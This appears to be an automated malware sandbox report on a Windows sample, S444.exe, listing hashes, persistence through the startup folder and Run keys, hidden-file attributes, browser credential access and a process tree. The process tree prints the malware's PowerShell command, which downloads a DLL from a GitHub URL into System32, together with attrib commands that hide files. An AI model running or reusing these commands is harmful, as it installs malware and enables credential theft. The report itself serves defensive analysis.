Overview
overview
10Static
static
10flashETHv.1.exe
windows7-x64
10flashETHv.1.exe
windows10-2004-x64
10S444.exe
windows7-x64
10S444.exe
windows10-2004-x64
10SYS.exe
windows7-x64
10SYS.exe
windows10-2004-x64
10USDT Flasher.exe
windows7-x64
3USDT Flasher.exe
windows10-2004-x64
3ss32.exe
windows7-x64
10ss32.exe
windows10-2004-x64
10winlogoc.exe
windows7-x64
10winlogoc.exe
windows10-2004-x64
10Analysis
-
max time kernel
143s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-12-2024 23:08
Behavioral task
behavioral1
Sample
flashETHv.1.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
flashETHv.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
S444.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
S444.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
SYS.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
SYS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
USDT Flasher.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
USDT Flasher.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
ss32.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
ss32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
winlogoc.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
winlogoc.exe
Resource
win10v2004-20241007-en
General
-
Target
S444.exe
-
Size
33KB
-
MD5
17e158e0f91dcc8168f2e416035926ed
-
SHA1
aac8bf1174db86568aab282b8a8de953c372ef1e
-
SHA256
bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b
-
SHA512
383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c
-
SSDEEP
768:WdQHdYES3hnpwEC/uc/zBaP09K737hNWhlLF:W7x8zgs9W37hMPJ
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1576 powershell.exe 6 1576 powershell.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1684 attrib.exe 2752 attrib.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe -
Executes dropped EXE 1 IoCs
pid Process 2832 $77-System32.exe -
Loads dropped DLL 1 IoCs
pid Process 2196 S444.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe -
pid Process 1576 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-System32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2832 $77-System32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe Token: 33 2832 $77-System32.exe Token: SeIncBasePriorityPrivilege 2832 $77-System32.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2196 wrote to memory of 2880 2196 S444.exe 31 PID 2196 wrote to memory of 2880 2196 S444.exe 31 PID 2196 wrote to memory of 2880 2196 S444.exe 31 PID 2196 wrote to memory of 2880 2196 S444.exe 31 PID 2880 wrote to memory of 2752 2880 cmd.exe 33 PID 2880 wrote to memory of 2752 2880 cmd.exe 33 PID 2880 wrote to memory of 2752 2880 cmd.exe 33 PID 2880 wrote to memory of 2752 2880 cmd.exe 33 PID 2196 wrote to memory of 2832 2196 S444.exe 34 PID 2196 wrote to memory of 2832 2196 S444.exe 34 PID 2196 wrote to memory of 2832 2196 S444.exe 34 PID 2196 wrote to memory of 2832 2196 S444.exe 34 PID 2832 wrote to memory of 1948 2832 $77-System32.exe 35 PID 2832 wrote to memory of 1948 2832 $77-System32.exe 35 PID 2832 wrote to memory of 1948 2832 $77-System32.exe 35 PID 2832 wrote to memory of 1948 2832 $77-System32.exe 35 PID 1948 wrote to memory of 1684 1948 cmd.exe 37 PID 1948 wrote to memory of 1684 1948 cmd.exe 37 PID 1948 wrote to memory of 1684 1948 cmd.exe 37 PID 1948 wrote to memory of 1684 1948 cmd.exe 37 PID 2832 wrote to memory of 1140 2832 $77-System32.exe 38 PID 2832 wrote to memory of 1140 2832 $77-System32.exe 38 PID 2832 wrote to memory of 1140 2832 $77-System32.exe 38 PID 2832 wrote to memory of 1140 2832 $77-System32.exe 38 PID 1140 wrote to memory of 1576 1140 cmd.exe 40 PID 1140 wrote to memory of 1576 1140 cmd.exe 40 PID 1140 wrote to memory of 1576 1140 cmd.exe 40 PID 1140 wrote to memory of 1576 1140 cmd.exe 40 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2752 attrib.exe 1684 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2752
-
-
-
C:\System32\$77-System32.exe"C:\System32\$77-System32.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\System32\$77-System32.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
229B
MD55623353a38611880912397750358a0cf
SHA11abfda3058cae5b11da3e6551fbec2eb354a25d3
SHA2564b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c
SHA51278b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb
-
Filesize
33KB
MD517e158e0f91dcc8168f2e416035926ed
SHA1aac8bf1174db86568aab282b8a8de953c372ef1e
SHA256bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b
SHA512383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c